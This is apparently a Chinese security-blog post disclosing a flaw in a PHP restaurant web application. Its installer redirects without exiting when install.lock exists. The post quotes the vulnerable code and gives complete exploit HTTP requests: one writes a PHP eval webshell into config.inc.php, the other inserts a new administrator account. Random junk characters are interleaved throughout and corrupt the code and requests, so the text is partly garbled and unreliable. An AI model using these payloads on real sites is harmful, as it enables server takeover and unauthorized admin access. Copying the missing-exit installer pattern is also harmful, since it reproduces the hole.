问题出在 /install/index.php 文件。程序安装完成后,会在程序根目录下生成 install.lock 文件,而 /install/index.php 在判断 install.lock 是否存在时的处理有误。
<?php' p$ ^/ N9 |; i4 E
if(file_exists("../install.lock"))
! T3 C2 x! k/ q0 z2 \1 f{% S( q# ~. Z( v# d; H, u2 Q+ i
header("Location: ../");//没有退出& B3 h" a! `6 C3 @) S
}' c- b2 I& H7 k7 n7 F
; p$ z/ r7 r+ B+ t/ Y9 x
//echo 'tst';exit;1 O: f$ R& V+ ?; P
require_once("init.php");
' z2 N5 i2 g! i" D* J! E3 u: Eif(empty($_REQUEST['step']) || $_REQUEST['step']==1)
" \3 F8 r- }# b# j9 S& b( ^{
可见在 install.lock 存在时,只是用 header() 做了 302 重定向而没有退出,也就是说下面的安装逻辑仍然会执行(正确的写法是在 header() 之后立即 exit)。在这里至少可以产生两个漏洞。
1、getshell(很危险)
. R+ b% j V/ {5 P0 n$ V% W; Wif(empty($_REQUEST['step']) || $_REQUEST['step']==1)2 B& m; N( G) F( |3 P
{0 X; b% k* v0 r3 S: X
$smarty->assign("step",1);: C+ P- B) @0 h3 y( f* O
$smarty->display("index.html");
- X/ g; y w9 C# Z" @/ s; a- e& S}elseif($_REQUEST['step']==2)
6 {5 I- R1 i- Q1 S t{+ F& O" W9 ?2 \7 `
$mysql_host=trim($_POST['mysql_host']);
' Q" J" }7 K0 g+ Z v $mysql_user=trim($_POST['mysql_user']);
. W0 F7 v9 P5 f Z $mysql_pwd=trim($_POST['mysql_pwd']);# \3 C- [3 {6 G" m
$mysql_db=trim($_POST['mysql_db']);: A& f" R- z* |9 p* J& l$ T1 W/ C
$tblpre=trim($_POST['tblpre']);$ x. _/ t. L# r4 v& h; b
$domain==trim($_POST['domain']);
g5 c( {1 `- i( `1 F $str="<?php \r\n";3 t( N* k3 ^; h. v, p& x
$str.='define("MYSQL_HOST","'.$mysql_host.'");'."\r\n";& c+ N% w4 X6 i- \' q
$str.='define("MYSQL_USER","'.$mysql_user.'");'."\r\n";1 M: H3 B7 ]& [2 b
$str.='define("MYSQL_PWD","'.$mysql_pwd.'");'."\r\n";
. g' k# F m3 m0 d2 B' W$ Z t $str.='define("MYSQL_DB","'.$mysql_db.'");'."\r\n";
" f+ T. ?) D6 G9 c7 S9 b6 F $str.='define("MYSQL_CHARSET","GBK");'."\r\n";
+ S* b: ?$ d( R& l $str.='define("TABLE_PRE","'.$tblpre.'");'."\r\n";
: q7 a6 \+ K7 v9 ~+ ^2 d" E/ N $str.='define("DOMAIN","'.$domain.'");'."\r\n";& d2 J" J+ r. ~! Y
$str.='define("SKINS","default");'."\r\n";
0 u2 [ z4 x- |. v! u# \ $str.='?>';& H# U4 {* H+ X8 P$ f2 z
file_put_contents("../config/config.inc.php",$str);//将提交的数据写入php文件
上面的代码只对 POST 数据做了 trim,未做任何转义就直接写入了 ../config/config.inc.php 文件,那么我们提交如下 POST 包,即可获得一句话木马:
POST /canting/install/index.php?m=index&step=2 HTTP/1.1% ]$ H0 }) c: V4 {3 S/ T t
Host: 192.168.80.129
% A! y. [2 F$ S. ^. \. vUser-Agent: Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/17.0 Firefox/17.0; e# ~# W9 y8 T' z
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8) A, F, J8 [( ~7 w
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
6 Y6 e' d" ?# o+ e% Y& l0 sAccept-Encoding: gzip, deflate
. j" l, e, r; {$ \Referer: http://192.168.80.129/canting/install/index.php?step=1' Z0 Z, k3 A: i1 F9 v* N! K# { h
Cookie: ck_ss_id=1354023211djfa6ggefdifvoa3kvhi61sc42; PHPSESSID=djfa6ggefdifvoa3kvhi61sc42
4 \4 @' W; B- x C: M! l' uContent-Type: application/x-www-form-urlencoded
5 u7 c6 L" p5 Q2 ~/ v' o0 ]Content-Length: 126/ ~1 P2 n: q. o" p2 k
: \" y G' D5 d% mmysql_host=test");@eval($_POST[x]);?>//&mysql_user=1&mysql_pwd=2&mysql_db=3&tblpre=koufu_&domain=www&button=%CF%C2%D2%BB%B2%BD
+ l9 |* B4 C3 F- F但是这个方法很危险,将导致网站无法运行。+ s" ]7 T) c1 Y( a O; K
2、直接添加管理员
/ t. L4 \) K0 i) a! B. z2 Selseif($_REQUEST['step']==5)9 c. P$ f% ^/ j. e" v: {6 b
{
" Q9 B5 e# I" g, F' U if($_POST)* L5 |& s! t$ M7 V+ v& U
{ require_once("../config/config.inc.php");& [6 F8 v% k% P& w
$link=mysql_connect(MYSQL_HOST,MYSQL_USER,MYSQL_PWD);
$ b) o1 _" o" }, n- i# H$ P mysql_select_db(MYSQL_DB,$link);3 V* v7 b$ L' H7 `% G
mysql_query("SET NAMES ".MYSQL_CHARSET );8 u. m* Y6 ?- D& P0 w, x
mysql_query("SET sql_mode=''");
% V+ C: g; h4 G( y" P+ q! c, i
% u7 b7 ]" l5 N2 ~7 N4 k $adminname=trim($_POST['adminname']);
% q, m L3 `1 z E8 v0 w $pwd1=trim($_POST['pwd1']);. n1 b5 a0 A! q1 i1 x& ]% x, j. e7 ?
$pwd2=trim($_POST['pwd2']);% @. ]7 G1 Q' ?, q( O7 L
if(empty($adminname))
+ S% T1 ~' Y x3 f; H {( V8 c7 G: \$ ]+ }
" w i8 K3 _- L; C* W: X echo "<script>alert('管理员不能为空');history.go(-1);</script>";, P+ R8 M( c7 m j; ^0 r. z0 z
exit();' s& O. u* W3 i4 J1 S. P
}
3 F7 {# f5 h" V; M9 M0 d7 b' a if(($pwd1!=$pwd2) or empty($pwd1))
, h3 k' }, [# {$ p$ A {
, v! n# {( O3 S echo "<script>alert('两次输入的密码不一致');history.go(-1);</script>";//这里也是没有退出
0 c* J+ M+ d! V9 V+ ~" d }) }% X) y. c8 V" r$ C' G" c+ i/ n
mysql_query("insert into ".TABLE_PRE."admin(adminname,password,isfounder) values('$adminname','".umd5($pwd1)."',1)");//直接可以插入一个管理员5 j6 a6 v: Y* q# }1 c. M& t
}
这样的话我们就可以直接插入一个 qingshen/qingshen 的管理员帐号,请求如下:
POST /canting/install/index.php?m=index&step=5 HTTP/1.1. u- X$ ?+ K5 I. a" k9 p$ j( Z
Host: 192.168.80.129
5 L/ v! }% y( _$ J2 vUser-Agent: Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/17.0 Firefox/17.0/ }; b! a) m; @' D
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8. ^( x; K* {8 [, u5 M0 b* `
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.31 _3 X% B W% f" b& `: d- B( j
Accept-Encoding: gzip, deflate0 e( I. {$ f9 s6 ^" D3 M& ?) I3 t \
Referer: http://www.2cto.com /canting/install/index.php?step=10 J2 a* V8 c; }1 ]
Cookie: ck_ss_id=1354023211djfa6ggefdifvoa3kvhi61sc42; PHPSESSID=djfa6ggefdifvoa3kvhi61sc42; _" ^8 e2 u* j. n2 H% U! Z, X
Content-Type: application/x-www-form-urlencoded5 T9 E* [5 X8 x5 M
Content-Length: 46
/ n; z6 w% K& ^% x. h
( Q$ A: b0 Q- G. P2 Tadminname=qingshen&pwd1=qingshen&pwd2=qingshen
% |# C- |7 c, x+ M' G# { |